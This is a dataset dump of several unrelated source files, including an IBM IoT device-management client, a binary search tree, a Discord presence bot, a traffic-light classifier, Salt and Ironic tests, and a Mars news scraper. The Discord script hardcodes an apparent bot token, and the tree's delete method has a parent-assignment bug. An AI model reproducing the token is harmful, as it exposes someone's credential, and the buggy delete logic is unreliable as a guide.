reqId\n\t\t}\n\n\t\tresolvedEvent = threading.Event()\n\t\tself.client.publish(ManagedClient.CLEAR_LOG_TOPIC, payload=json.dumps(message), qos=1, retain=False)\n\t\twith self._deviceMgmtRequestsPendingLock:\n\t\t\tself._deviceMgmtRequestsPending[reqId] = {\"topic\": ManagedClient.CLEAR_LOG_TOPIC, \"message\": message, \"event\": resolvedEvent}\n\n\t\treturn resolvedEvent\n\n\n\tdef __onDeviceMgmtResponse(self, client, userdata, pahoMessage):\n\n\t\twith self._recvLock:\n\t\t\tself.recv = self.recv + 1\n\n\t\ttry:\n\t\t\tdata = json.loads(pahoMessage.payload.decode(\"utf-8\"))\n\t\t\tif 'rc' not in data:\n\t\t\t\treturn True\n\t\t\trc = data['rc']\n\t\t\treqId = data['reqId']\n\t\texcept ValueError as e:\n\t\t\traise Exception(\"Unable to parse JSON. payload=\\\"%s\\\" error=%s\" % (pahoMessage.payload, str(e)))\n\t\telse:\n\t\t\trequest = None\n\t\t\twith self._deviceMgmtRequestsPendingLock:\n\t\t\t\ttry:\n\t\t\t\t\trequest = self._deviceMgmtRequestsPending.pop(reqId)\n\t\t\t\texcept KeyError:\n\t\t\t\t\tself.logger.warning(\"Received unexpected response from device management: %s\" % (reqId))\n\t\t\t\telse:\n\t\t\t\t\tself.logger.debug(\"Remaining unprocessed device management requests: %s\" % (len(self._deviceMgmtRequestsPending)))\n\n\n\t\t\tif request is None:\n\t\t\t\treturn False\n\n\t\t\tif request['topic'] == ManagedClient.MANAGE_TOPIC:\n\t\t\t\tif rc == 200:\n\t\t\t\t\tself.logger.info(\"[%s] Manage action completed: %s\" % (rc, json.dumps(request['message'])))\n\t\t\t\t\tself.readyForDeviceMgmt.set()\n\t\t\t\telse:\n\t\t\t\t\tself.logger.critical(\"[%s] Manage action failed: %s\" % (rc, json.dumps(request['message'])))\n\n\t\t\telif request['topic'] == ManagedClient.UNMANAGE_TOPIC:\n\t\t\t\tif rc == 200:\n\t\t\t\t\tself.logger.info(\"[%s] Unmanage action completed: %s\" % (rc, json.dumps(request['message'])))\n\t\t\t\t\tself.readyForDeviceMgmt.clear()\n\t\t\t\telse:\n\t\t\t\t\tself.logger.critical(\"[%s] Unmanage action failed: %s\" % (rc, json.dumps(request['message'])))\n\n\t\t\telif request['topic'] == ManagedClient.UPDATE_LOCATION_TOPIC:\n\t\t\t\tif rc == 200:\n\t\t\t\t\tself.logger.info(\"[%s] Location update action completed: %s\" % (rc, json.dumps(request['message'])))\n\t\t\t\telse:\n\t\t\t\t\tself.logger.critical(\"[%s] Location update action failed: %s\" % (rc, json.dumps(request['message'])))\n\n\t\t\telif request['topic'] == ManagedClient.ADD_ERROR_CODE_TOPIC:\n\t\t\t\tif rc == 200:\n\t\t\t\t\tself.logger.info(\"[%s] Add error code action completed: %s\" % (rc, json.dumps(request['message'])))\n\t\t\t\telse:\n\t\t\t\t\tself.logger.critical(\"[%s] Add error code action failed: %s\" % (rc, json.dumps(request['message'])))\n\n\t\t\telif request['topic'] == ManagedClient.CLEAR_ERROR_CODES_TOPIC:\n\t\t\t\tif rc == 200:\n\t\t\t\t\tself.logger.info(\"[%s] Clear error codes action completed: %s\" % (rc, json.dumps(request['message'])))\n\t\t\t\telse:\n\t\t\t\t\tself.logger.critical(\"[%s] Clear error codes action failed: %s\" % (rc, json.dumps(request['message'])))\n\n\t\t\telif request['topic'] == ManagedClient.ADD_LOG_TOPIC:\n\t\t\t\tif rc == 200:\n\t\t\t\t\tself.logger.info(\"[%s] Add log action completed: %s\" % (rc, json.dumps(request['message'])))\n\t\t\t\telse:\n\t\t\t\t\tself.logger.critical(\"[%s] Add log action failed: %s\" % (rc, json.dumps(request['message'])))\n\n\t\t\telif request['topic'] == ManagedClient.CLEAR_LOG_TOPIC:\n\t\t\t\tif rc == 200:\n\t\t\t\t\tself.logger.info(\"[%s] Clear log action completed: %s\" % (rc, json.dumps(request['message'])))\n\t\t\t\telse:\n\t\t\t\t\tself.logger.critical(\"[%s] Clear log action failed: %s\" % (rc, json.dumps(request['message'])))\n\t\t\telse:\n\t\t\t\tself.logger.warning(\"[%s] Unknown action response: %s\" % (rc, json.dumps(request['message'])))\n\n\t\t\t# Now clear the event, allowing anyone that was waiting on this to proceed\n\t\t\trequest[\"event\"].set()\n\t\t\treturn True\n\n\t#Device Action Handlers\n\tdef __onRebootRequest(self,client,userdata,pahoMessage):\n\t\tself.logger.info(\"Message received on topic :%s with payload %s\" % (ManagedClient.DM_REBOOT_TOPIC,pahoMessage.payload.decode(\"utf-8\")))\n\t\ttry:\n\t\t\tdata = json.loads(pahoMessage.payload.decode(\"utf-8\"))\n\t\t\treqId = data['reqId']\n\t\t\tif self.deviceActionCallback : self.deviceActionCallback(reqId,\"reboot\")\n\t\texcept ValueError as e:\n\t\t\traise Exception(\"Unable to process Reboot request. payload=\\\"%s\\\" error=%s\" % (pahoMessage.payload, str(e)))\n\n\tdef __onFactoryResetRequest(self,client,userdata,pahoMessage):\n\t\tself.logger.info(\"Message received on topic :%s with payload %s\" % (ManagedClient.DM_FACTORY_REESET,pahoMessage.payload.decode(\"utf-8\")))\n\t\ttry:\n\t\t\tdata = json.loads(pahoMessage.payload.decode(\"utf-8\"))\n\t\t\treqId = data['reqId']\n\t\t\tif self.deviceActionCallback : self.deviceActionCallback(reqId,\"reset\")\n\t\texcept ValueError as e:\n\t\t\traise Exception(\"Unable to process Factory Reset request. payload=\\\"%s\\\" error=%s\" % (pahoMessage.payload, str(e)))\n\n\tdef respondDeviceAction(self,reqId,responseCode=202,message=\"\"):\n\t\tresponse ={\n\t\t\t\t \"rc\": responseCode,\n\t\t\t\t \"message\": message,\n\t\t\t\t \"reqId\": reqId\n\t\t\t\t}\n\t\tpayload=json.dumps(response)\n\t\tself.logger.info(\"Publishing Device Action response with payload :%s\" % payload)\n\t\tself.client.publish('iotdevice-1/response', payload,qos=1, retain=False)\n\n\t#Firmware Handlers\n\tdef __onFirmwereDownload(self,client,userdata,pahoMessage):\n\t\tself.logger.info(\"Message received on topic :%s with payload %s\" % (ManagedClient.DM_FIRMWARE_DOWNLOAD_TOPIC,pahoMessage.payload.decode(\"utf-8\")))\n\t\tdata = json.loads(pahoMessage.payload.decode(\"utf-8\"))\n\t\treqId = data['reqId']\n\t\trc = ManagedClient.RESPONSECODE_ACCEPTED\n\t\tmsg =\"\"\n\t\tif self.__firmwareUpdate.state != ManagedClient.UPDATESTATE_IDLE :\n\t\t\trc = ManagedClient.RESPONSECODE_BAD_REQUEST\n\t\t\tmsg = \"Cannot download as the device is not in idle state\"\n\t\tthreading.Thread(target= self.respondDeviceAction,args=(reqId,rc,msg)).start()\n\t\tif self.firmwereActionCallback :\n\t\t\tself.firmwereActionCallback(\"download\",self.__firmwareUpdate)\n\n\n\tdef __onFirmwereCancel(self,client,userdata,pahoMessage):\n\t\tself.logger.info(\"Message received on topic :%s with payload %s\" % (ManagedClient.DM_CANCEL_OBSERVE_TOPIC,pahoMessage.payload.decode(\"utf-8\")))\n\t\tdata = json.loads(pahoMessage.payload.decode(\"utf-8\"))\n\t\treqId = data['reqId']\n\t\tthreading.Thread(target= self.respondDeviceAction,args=(reqId,200,\"\")).start()\n\n\tdef __onFirmwereObserve(self,client,userdata,pahoMessage):\n\t\tself.logger.info(\"Message received on topic :%s with payload %s\" % (ManagedClient.DM_OBSERVE_TOPIC,pahoMessage.payload.decode(\"utf-8\")))\n\t\tdata = json.loads(pahoMessage.payload.decode(\"utf-8\"))\n\t\treqId = data['reqId']\n\t\t#TODO : Proprer validation for fields in payload\n\t\tthreading.Thread(target= self.respondDeviceAction,args=(reqId,200,\"\")).start()\n\n\tdef __onUpdatedDevice(self,client,userdata,pahoMessage):\n\t\tself.logger.info(\"Message received on topic :%s with payload %s\" % (ManagedClient.DM_UPDATE_TOPIC,pahoMessage.payload.decode(\"utf-8\")))\n\t\tdata = json.loads(pahoMessage.payload.decode(\"utf-8\"))\n\t\treqId = data['reqId']\n\t\td=data['d']\n\t\tvalue = None\n\t\tfor obj in d['fields'] :\n\t\t\tif 'field' in obj :\n\t\t\t\tif obj['field'] == \"mgmt.firmware\" :\n\t\t\t\t\tvalue = obj[\"value\"]\n\t\tif value != None :\n\t\t\tself.__firmwareUpdate = DeviceFirmware(value['version'],value['name'],value['uri'],value['verifier'],value['state'],value['updateStatus'],value['updatedDateTime'])\n\t\tthreading.Thread(target= self.respondDeviceAction,args=(reqId,204,\"\")).start()\n\n\tdef setState(self,status):\n\t\tnotify = {\"d\":{\"fields\":[{\"field\":\"mgmt.firmware\",\"value\":{\"state\":status}}]}}\n\t\tif self.__firmwareUpdate != None :\n\t\t\tself.__firmwareUpdate.state = status\n\n\t\tself.logger.info(\"Publishing state Update with payload :%s\" % json.dumps(notify))\n\t\tthreading.Thread(target= self.client.publish,args=('iotdevice-1/notify',json.dumps(notify),1, False)).start()\n\n\tdef setUpdateStatus(self,status):\n\t\tnotify = {\"d\":{\"fields\":[{\"field\":\"mgmt.firmware\",\"value\":{\"state\":ManagedClient.UPDATESTATE_IDLE,\"updateStatus\":status}}]}}\n\t\tif self.__firmwareUpdate != None :\n\t\t\tself.__firmwareUpdate.state = ManagedClient.UPDATESTATE_IDLE\n\t\t\tself.__firmwareUpdate.updateStatus = status\n\n\t\tself.logger.info(\"Publishing Update Status with payload :%s\" % json.dumps(notify))\n\t\tthreading.Thread(target= self.client.publish,args=('iotdevice-1/notify',json.dumps(notify),1, False)).start()\n\n\tdef __onFirmwereUpdate(self,client,userdata,pahoMessage):\n\t\tself.logger.info(\"Message received on topic :%s with payload %s\" % (ManagedClient.DM_FIRMWARE_UPDATE_TOPIC,pahoMessage.payload.decode(\"utf-8\")))\n\t\tdata = json.loads(pahoMessage.payload.decode(\"utf-8\"))\n\t\treqId = data['reqId']\n\t\trc = ManagedClient.RESPONSECODE_ACCEPTED\n\t\tmsg =\"\"\n\t\tif self.__firmwareUpdate.state != ManagedClient.UPDATESTATE_DOWNLOADED :\n\t\t\trc = ManagedClient.RESPONSECODE_BAD_REQUEST\n\t\t\tmsg = \"Firmware is still not successfully downloaded.\"\n\t\tthreading.Thread(target= self.respondDeviceAction,args=(reqId,rc,msg)).start()\n\t\tif self.firmwereActionCallback :\n\t\t\tself.firmwereActionCallback(\"update\",self.__firmwareUpdate)\n\n\tdef __onDMEActionRequest(self,client,userdata,pahoMessage):\n\t\tdata = json.loads(pahoMessage.payload.decode(\"utf-8\"))\n\t\tself.logger.info(\"Message received on topic :%s with payload %s\"\n\t\t % (ManagedClient.DME_ACTION_TOPIC,data))\n\t\treqId = data['reqId']\n\t\tif self.dmeActionCallback :\n\t\t\tif self.dmeActionCallback(pahoMessage.topic,data,reqId):\n\t\t\t\tmsg = \"DME Action successfully completed from Callback\"\n\t\t\t\tthreading.Thread(target= self.respondDeviceAction,args=(reqId,200,msg)).start()\n\t\t\telse:\n\t\t\t\tmsg = \"Unexpected device error\"\n\t\t\t\tthreading.Thread(target= self.respondDeviceAction,args=(reqId,500,msg)).start()\n\n\t\telse :\n\t\t\tthreading.Thread(target= self.respondDeviceAction,args=(reqId,501,\"Operation not implemented\")).start()\n\n\ndef ParseConfigFile(configFilePath):\n\tparms = configparser.ConfigParser({\"domain\": \"internetofthings.ibmcloud.com\",\n\t \"port\": \"8883\",\"clean-session\": \"true\"})\n\tsectionHeader = \"device\"\n\ttry:\n\t\twith open(configFilePath) as f:\n\t\t\ttry:\n\t\t\t\tparms.read_file(f)\n\t\t\texcept AttributeError:\n\t\t\t\t# Python 2.7 support\n\t\t\t\t# https://docs.python.org/3/library/configparser.html#configparser.ConfigParser.read_file\n\t\t\t\tparms.readfp(f)\n\n\t\tdomain = parms.get(sectionHeader, \"domain\")\n\t\torganization = parms.get(sectionHeader, \"org\")\n\t\tdeviceType = parms.get(sectionHeader, \"type\")\n\t\tdeviceId = parms.get(sectionHeader, \"id\")\n\t\tauthMethod = parms.get(sectionHeader, \"auth-method\")\n\t\tauthToken = parms.get(sectionHeader, \"auth-token\")\n\t\tcleanSession = parms.get(sectionHeader, \"clean-session\")\n\t\tport = parms.get(sectionHeader, \"port\")\n\n\texcept IOError as e:\n\t\treason = \"Error reading device configuration file '%s' (%s)\" % (configFilePath,e[1])\n\t\traise ConfigurationException(reason)\n\n\treturn {'domain': domain, 'org': organization, 'type': deviceType,\n\t 'id': deviceId, 'auth-method': authMethod, 'auth-token': authToken,\n\t\t\t'clean-session': cleanSession, 'port': port}\n","sub_path":"src/Raspberry/LeoNickTEAM/ibmiotf/device.py","file_name":"device.py","file_ext":"py","file_size_in_byte":35027,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"427469630","text":"class BSTNode:\n def __init__(self,val):\n self.val = val\n self.parent = None\n self.left = None\n self.right = None\n\n def insert(self,newnode):\n if newnode.val < self.val:\n if self.left is not None:\n return self.left.insert(newnode)\n else:\n self.left = newnode\n newnode.parent = self\n elif self.right is not None:\n return self.right.insert(newnode)\n else:\n self.right = newnode\n newnode.parent = self\n def inordertravel(self):\n if self.left is not None:\n self.left.inordertravel()\n print(self.val)\n if self.right is not None:\n self.right.inordertravel()\n\n def findmin(self):\n if self.left is None:\n return self\n else:\n return self.left.findmin()\n\n def findmax(self):\n if self.right is None:\n return self\n else:\n return self.right.findmax()\n\n def successor(self):\n if self.right is not None:\n return self.right.findmin()\n pointer = self\n while pointer.parent is not None and pointer is self.parent.right:\n pointer = pointer.parent\n return pointer.parent\n\n def successive(self):\n if self.left is not None:\n return self.left.findmax()\n pointer = self\n while pointer.parent is not None and pointer is self.parent.left:\n pointer = pointer.parent\n return pointer.parent\n\n def delete(self):#delete the node and return it\n if self.left is None or self.right is None:\n if self.parent.left == self:\n self.parent = self.left or self.right\n if self.parent.left is not None:\n self.parent.left.parent = self.parent\n else:\n self.parent.right = self.left or self.right\n if self.parent.right is not None:\n self.parent.right.parent = self.parent\n return self\n else:\n pointer = self.successor()\n self.val, pointer.val = pointer.val, self.val\n return pointer.delete()\n","sub_path":"L5.py","file_name":"L5.py","file_ext":"py","file_size_in_byte":2215,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"507086598","text":"import discord\nimport datetime\nimport logging\nimport asyncio\n\nlogging.basicConfig(format=\"%(asctime)s %(funcName)s : %(levelname)s : %(message)s\",\n level=logging.INFO)\n\napp = discord.Client()\nprev_music = \"\"\n\ntoken = \"NjEyMjYyNTE3MTU4MzEzOTg0.XVfz5w.ZdCmXctHkpE4kZDZtP7DpDN82G4\"\n\n@app.event\nasync def on_ready():\n print(\"다음으로 로그인합니다:\\n ID : {}\\n password : {}\".format(app.user.name, app.user.id))\n print(\"=================\")\n await app.change_presence(activity=discord.Game(name=\"대기\", type=0), status=discord.Status.idle)\n return await update()\n\nasync def update():\n global prev_music\n\n while True:\n with open(\"musicInfo\", \"r\") as f:\n current_music = f.readline()\n\n if not current_music == prev_music:\n if current_music == \"stop\":\n await app.change_presence(activity=discord.Game(name=\"대기\"), status=discord.Status.idle)\n else:\n prev_music = current_music\n await app.change_presence(activity=discord.Game(name=f\"{current_music} 을(를) 신나게 플레이\", type=0), status=discord.Status.online)\n\n await asyncio.sleep(1)\n\napp.run(token)\n","sub_path":"bot_presence.py","file_name":"bot_presence.py","file_ext":"py","file_size_in_byte":1208,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"575092426","text":"#from styx_msgs.msg import TrafficLight\n\nimport os\nimport sys\nfrom glob import glob\nfrom PIL import Image\nimport numpy as np\nimport tensorflow as tf\nimport matplotlib.pyplot as plt\nfrom collections import defaultdict\nfrom utils import label_map_util\nfrom utils import visualization_utils as vis_util\nimport random\nfrom styx_msgs.msg import TrafficLightArray, TrafficLight\n\n## load SSD trained on udacity's simulator images\nPATH_TO_GRAPH = r'./light_classification/model/sim/8_batch/frozen_inference_graph.pb' \n\nPATH_TO_LABELS = r'./light_classification/model/udacity_label_map.pbtxt'\nNUM_CLASSES = 13\n\n#if the score is under this value, unknown state is returned.\nMINIMUM_SCORE_THRESHOLD =0.2\n\n# red in .pb output\nRED_LIGHT=1\n\n\n# .pb file\n#subfolder = ['Green', 'Red', 'Yellow', 'Unknown']\n\n#styx_msgs/msg/TrafficLight.msg\n#uint8 UNKNOWN=4\n#uint8 GREEN=2\n#uint8 YELLOW=1\n#uint8 RED=0\n\n# .pb -> msg\n#convertedColor=[2,0,1,4]\n\nclass TLClassifier(object):\n def __init__(self):\n detection_graph = self.load_graph(PATH_TO_GRAPH)\n label_map = label_map_util.load_labelmap(PATH_TO_LABELS)\n categories = label_map_util.convert_label_map_to_categories(\n label_map, max_num_classes=NUM_CLASSES, use_display_name=True)\n category_index = label_map_util.create_category_index(categories)\n print(category_index)\n detection_graph.as_default()\n\n self.sess = tf.Session(graph= detection_graph)\n\n self.image_tensor = detection_graph.get_tensor_by_name('image_tensor:0')\n self.detect_boxes = detection_graph.get_tensor_by_name('detection_boxes:0')\n self.detect_scores = detection_graph.get_tensor_by_name('detection_scores:0')\n self.detect_classes = detection_graph.get_tensor_by_name('detection_classes:0')\n self.num_detections = detection_graph.get_tensor_by_name('num_detections:0')\n\n def get_classification(self, image):\n \"\"\"Determines the color of the traffic light in the image\n\n Args:\n image (cv::Mat): image containing the traffic light\n\n Returns:\n int: ID of traffic light color (specified in styx_msgs/TrafficLight)\n\n \"\"\"\n #TODO implement light color prediction\n #image_np = self.load_image_into_numpy_array(image)\n global MINIMUM_SCORE_THRESHOLD\n global RED_LIGHT\n image_np = image\n image_expanded = np.expand_dims(image_np, axis=0)\n\n (boxes, scores, classes, num) = self.sess.run(\n [self.detect_boxes, self.detect_scores, self.detect_classes, self.num_detections],\n feed_dict={self.image_tensor: image_expanded})\n\n # print('SCORES')\n # print(scores[0])\n # print('CLASSES')\n # print(classes[0])\n\n\n #sys.stderr.write(\"score:classes: \" + str(scores[0]) + \"--------\" + str(classes[0]) + \"\\n\" )\n\n if scores[0][0] > MINIMUM_SCORE_THRESHOLD and int(classes[0][0]) == RED_LIGHT : # 1 is RED in .pb \n sys.stderr.write(\"[RED] detected...\" + \"\\n\")\n return TrafficLight.RED\n else:\n sys.stderr.write(\"[^RED] detected...\" + \"\\n\")\n return TrafficLight.UNKNOWN\n\n\n\n def load_graph(self,graph_file):\n \"\"\"Loads a frozen inference graph\"\"\"\n graph = tf.Graph()\n with graph.as_default():\n od_graph_def = tf.GraphDef()\n with tf.gfile.GFile(graph_file, 'rb') as fid:\n serialized_graph = fid.read()\n od_graph_def.ParseFromString(serialized_graph)\n tf.import_graph_def(od_graph_def, name='')\n return graph\n \n \n def load_image_into_numpy_array(self,image):\n (im_width, im_height) = image.size\n return np.array(image.getdata()).reshape((im_height, im_width, 3)).astype(np.uint8)\n\n\n\n \n\n\n","sub_path":"ros/src/tl_detector/light_classification/tl_classifier.py","file_name":"tl_classifier.py","file_ext":"py","file_size_in_byte":3882,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"267667932","text":"# -*- coding: utf-8 -*-\n'''\n :codeauthor: :email:`Nicole Thomas `\n'''\n\n# Import Salt Testing Libs\nfrom salttesting import TestCase\nfrom salttesting.mock import MagicMock, patch, mock_open, call\nfrom salttesting.helpers import ensure_in_syspath\n\nensure_in_syspath('../../')\n\n#Import Salt Libs\nfrom salt.modules import dnsutil\n\nmock_hosts_file = '##\\n'\\\n '# Host Database\\n'\\\n '#\\n'\\\n '# localhost is used to configure the loopback interface\\n'\\\n '# when the system is booting. Do not change this entry.\\n'\\\n '##\\n'\\\n '127.0.0.1\tlocalhost\\n'\\\n '255.255.255.255\tbroadcasthost\\n'\\\n '::1 localhost\\n'\\\n 'fe80::1%lo0\tlocalhost'\n\nmock_hosts_file_rtn = {'::1': ['localhost'], '255.255.255.255': ['broadcasthost'],\n '127.0.0.1': ['localhost'], 'fe80::1%lo0': ['localhost']}\n\nmock_calls_list = [call.read(), call.write('##\\n'),\n call.write('# Host Database\\n'),\n call.write('#\\n'),\n call.write('# localhost is used to configure the loopback interface\\n'),\n call.write('# when the system is booting. Do not change this entry.\\n'),\n call.write('##\\n'),\n call.write('127.0.0.1 localhost'),\n call.write('\\n'),\n call.write('255.255.255.255 broadcasthost'),\n call.write('\\n'),\n call.write('::1 localhost'),\n call.write('\\n'),\n call.write('fe80::1%lo0 localhost'),\n call.write('\\n'),\n call.close()]\n\n\nclass DNSUtilTestCase(TestCase):\n\n def test_parse_hosts(self):\n with patch('salt.utils.fopen', mock_open(read_data=mock_hosts_file)):\n self.assertEqual(dnsutil.parse_hosts(), {'::1': ['localhost'],\n '255.255.255.255': ['broadcasthost'],\n '127.0.0.1': ['localhost'],\n 'fe80::1%lo0': ['localhost']})\n\n @patch('salt.modules.dnsutil.parse_hosts', MagicMock(return_value=mock_hosts_file_rtn))\n def test_hosts_append(self):\n with patch('salt.utils.fopen', mock_open(read_data=mock_hosts_file)) as m_open:\n dnsutil.hosts_append('/etc/hosts', '127.0.0.1', 'ad1.yuk.co,ad2.yuk.co')\n helper_open = m_open()\n helper_open.write.assert_called_once_with('\\n127.0.0.1 ad1.yuk.co ad2.yuk.co')\n\n def test_hosts_remove(self):\n toRemove = 'ad1.yuk.co'\n new_mock_file = mock_hosts_file + '\\n127.0.0.1 ' + toRemove + '\\n'\n with patch('salt.utils.fopen', mock_open(read_data=new_mock_file)) as m_open:\n dnsutil.hosts_remove('/etc/hosts', toRemove)\n helper_open = m_open()\n calls_list = helper_open.method_calls\n self.assertEqual(calls_list, mock_calls_list)\n","sub_path":"tests/unit/modules/dnsutil_test.py","file_name":"dnsutil_test.py","file_ext":"py","file_size_in_byte":3095,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"178457283","text":"# Dependencies\nfrom bs4 import BeautifulSoup as bs\nfrom pprint import pprint\nfrom splinter import Browser\nfrom time import sleep\nimport pandas as pd\n\ndef scrape():\n\n # Windows executable path\n executable_path = {'executable_path': '/Users/jhonp/Downloads/chromedriver'}\n b = Browser('chrome', **executable_path, headless=False)\n\n # Mac executable path\n # executable_path = {'executable_path': '/usr/local/bin/chromedriver'}\n # b = Browser('chrome', **executable_path, headless=False)\n\n news_title, news_p = mars_news(b)\n \n results = {\n 'title': news_title,\n 'paragraph': news_p,\n 'image_URL': jpl_image(b),\n 'weather': mars_weather_tweet(b),\n 'facts': mars_facts(),\n 'hemispheres': mars_hemis(b),\n }\n\n b.quit()\n return results\n\ndef mars_news(b):\n url = 'https://mars.nasa.gov/news/'\n b.visit(url)\n html = b.html\n mars_bs = bs(html, 'lxml')\n\n news_title = mars_bs.find('div', class_='content_title').text\n news_p = mars_bs.find('div', class_='article_teaser_body').text\n return news_title, news_p\n\ndef jpl_image(b):\n url = 'https://www.jpl.nasa.gov/spaceimages/?search=&category=Mars'\n b.visit(url)\n\n b.click_link_by_partial_text('FULL IMAGE')\n sleep(1)\n b.click_link_by_partial_text('more info')\n\n html = b.html\n image_soup = bs(html, 'lxml')\n\n feat_img_url = image_soup.find('figure', class_='lede').a['href']\n feat_img_full_url = f'https://www.jpl.nasa.gov{feat_img_url}'\n return feat_img_full_url\n\ndef mars_weather_tweet(b):\n url = 'https://twitter.com/marswxreport?lang=en'\n b.visit(url)\n html = b.html\n tweet_soup = bs(html, 'lxml')\n \n first_tweet = tweet_soup.find('p', class_='TweetTextSize').text\n return first_tweet\n \ndef mars_facts():\n url = 'https://space-facts.com/mars/'\n tables = pd.read_html(url)\n df = tables[0]\n df.columns = ['Property', 'Value']\n df.set_index('Property', inplace=True)\n \n return df.to_html()\n \ndef mars_hemis(b):\n url = 'https://astrogeology.usgs.gov/search/results?q=hemisphere+enhanced&k1=target&v1=Mars'\n b.visit(url)\n \n html = b.html\n hemi_soup = bs(html, 'html.parser')\n\n hemi_strings = []\n links = hemi_soup.find_all('h3')\n \n for hemi in links:\n hemi_strings.append(hemi.text)\n\n hemisphere_image_urls = []\n\n # Loop through the hemisphere links to gather the images\n for hemi in hemi_strings:\n hemi_dict = {}\n \n b.click_link_by_partial_text(hemi)\n hemi_dict['img_url'] = b.find_by_text('Sample')['href']\n hemi_dict['title'] = hemi\n hemisphere_image_urls.append(hemi_dict)\n pprint(hemisphere_image_urls)\n \n b.click_link_by_partial_text('Back')\n \n return hemisphere_image_urls","sub_path":"Web-Scraping-Challenge/Web-Scraping-Challenge/scrape_mars.py","file_name":"scrape_mars.py","file_ext":"py","file_size_in_byte":2803,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"429909964","text":"# Copyright (c) 2016 Mirantis, Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nimport six\nfrom tempest.lib.common.utils import data_utils\nfrom tempest.lib import exceptions\n\nfrom ironicclient.tests.functional import base\n\n\nclass ChassisSanityTestIronicClient(base.FunctionalTestBase):\n \"\"\"Sanity tests for testing actions with Chassis.\n\n Smoke test for the Ironic CLI commands which checks basic actions with\n chassis command like create, show, update, delete etc.\n \"\"\"\n def setUp(self):\n super(ChassisSanityTestIronicClient, self).setUp()\n self.chassis = self.create_chassis()\n\n def test_chassis_create(self):\n \"\"\"Test steps:\n\n 1) create chassis\n 2) check that chassis has been successfully created\n \"\"\"\n chassis_list_uuid = self.get_chassis_uuids_from_chassis_list()\n self.assertIn(self.chassis['uuid'], chassis_list_uuid)\n\n def test_chassis_delete(self):\n \"\"\"Test steps:\n\n 1) create chassis\n 2) check that chassis has been successfully created\n 3) delete chassis\n 4) check that chassis has been successfully deleted\n \"\"\"\n self.delete_chassis(self.chassis['uuid'])\n chassis_list_uuid = self.get_chassis_uuids_from_chassis_list()\n\n self.assertNotIn(self.chassis['uuid'], chassis_list_uuid)\n\n def test_chassis_show(self):\n \"\"\"Test steps:\n\n 1) create chassis\n 2) check that chassis-show returns the same chassis UUID\n 3) chassis-create\n \"\"\"\n chassis_show = self.show_chassis(self.chassis['uuid'])\n self.assertEqual(self.chassis['uuid'], chassis_show['uuid'])\n\n def test_chassis_show_field(self):\n \"\"\"Test steps:\n\n 1) create chassis\n 2) show chassis with fields uuid\n 3) check that fields is exist\n \"\"\"\n fields = ['uuid']\n chassis_show = self.show_chassis(self.chassis['uuid'],\n params='--fields {0}'\n .format(*fields))\n self.assertTableHeaders(fields, chassis_show.keys())\n\n def test_chassis_update(self):\n \"\"\"Test steps:\n\n 1) create chassis\n 2) update chassis\n 3) check that chassis has been successfully updated\n \"\"\"\n updated_chassis = self.update_chassis(\n self.chassis['uuid'], 'add', 'description=test-chassis')\n self.assertEqual('test-chassis', updated_chassis['description'])\n self.assertNotEqual(self.chassis['description'],\n updated_chassis['description'])\n\n def test_chassis_node_list(self):\n \"\"\"Test steps:\n\n 1) create chassis in setUp()\n 2) create 3 nodes\n 3) update 2 nodes to be included in chassis\n 4) check if 2 nodes are added to chassis\n 5) check if 1 nodes isn't added to chassis\n \"\"\"\n node1 = self.create_node()\n node2 = self.create_node()\n\n # This node is created to show that it won't be present\n # in the chassis-node-list output\n\n node3 = self.create_node()\n updated_node1 = self.update_node(node1['uuid'],\n 'add chassis_uuid={0}'\n .format(self.chassis['uuid']))\n updated_node2 = self.update_node(node2['uuid'],\n 'add chassis_uuid={0}'\n .format(self.chassis['uuid']))\n nodes = [updated_node1['uuid'], updated_node2['uuid']]\n nodes.sort()\n nodes_uuids = self.get_nodes_uuids_from_chassis_node_list(\n self.chassis['uuid'])\n nodes_uuids.sort()\n self.assertEqual(nodes, nodes_uuids)\n self.assertNotIn(node3['uuid'], nodes_uuids)\n\n\nclass ChassisNegativeTestsIronicClient(base.FunctionalTestBase):\n \"\"\"Negative tests for testing actions with Chassis.\n\n Negative tests for the Ironic CLI commands which checks actions with\n chassis command like show, update, delete either using with arguments\n or without arguments.\n \"\"\"\n\n def test_chassis_delete_without_arguments(self):\n \"\"\"Test step:\n\n 1) check that chassis-delete command without arguments\n triggers an exception\n \"\"\"\n ex_text = r'chassis-delete: error: too few arguments'\n\n six.assertRaisesRegex(self, exceptions.CommandFailed,\n ex_text,\n self.delete_chassis, '')\n\n def test_chassis_delete_with_incorrect_chassis_uuid(self):\n \"\"\"Test step:\n\n 1) check that deleting non-exist chassis triggers an exception\n triggers an exception\n \"\"\"\n uuid = data_utils.rand_uuid()\n ex_text = (r\"Chassis {0} \"\n r\"could not be found. \\(HTTP 404\\)\".format(uuid))\n\n six.assertRaisesRegex(self, exceptions.CommandFailed,\n ex_text,\n self.delete_chassis,\n '{0}'.format(uuid))\n\n def test_chassis_show_without_arguments(self):\n \"\"\"Test step:\n\n 1) check that chassis-show command without arguments\n triggers an exception\n \"\"\"\n ex_text = r'chassis-show: error: too few arguments'\n\n six.assertRaisesRegex(self, exceptions.CommandFailed,\n ex_text,\n self.show_chassis, '')\n\n def test_chassis_show_with_incorrect_chassis_uuid(self):\n \"\"\"Test step:\n\n 1) check that chassis-show command with incorrect chassis\n uuid triggers an exception\n \"\"\"\n uuid = data_utils.rand_uuid()\n ex_text = (r\"Chassis {0} \"\n r\"could not be found. \\(HTTP 404\\)\".format(uuid))\n\n six.assertRaisesRegex(self, exceptions.CommandFailed,\n ex_text,\n self.show_chassis,\n '{0}'.format(uuid))\n\n def 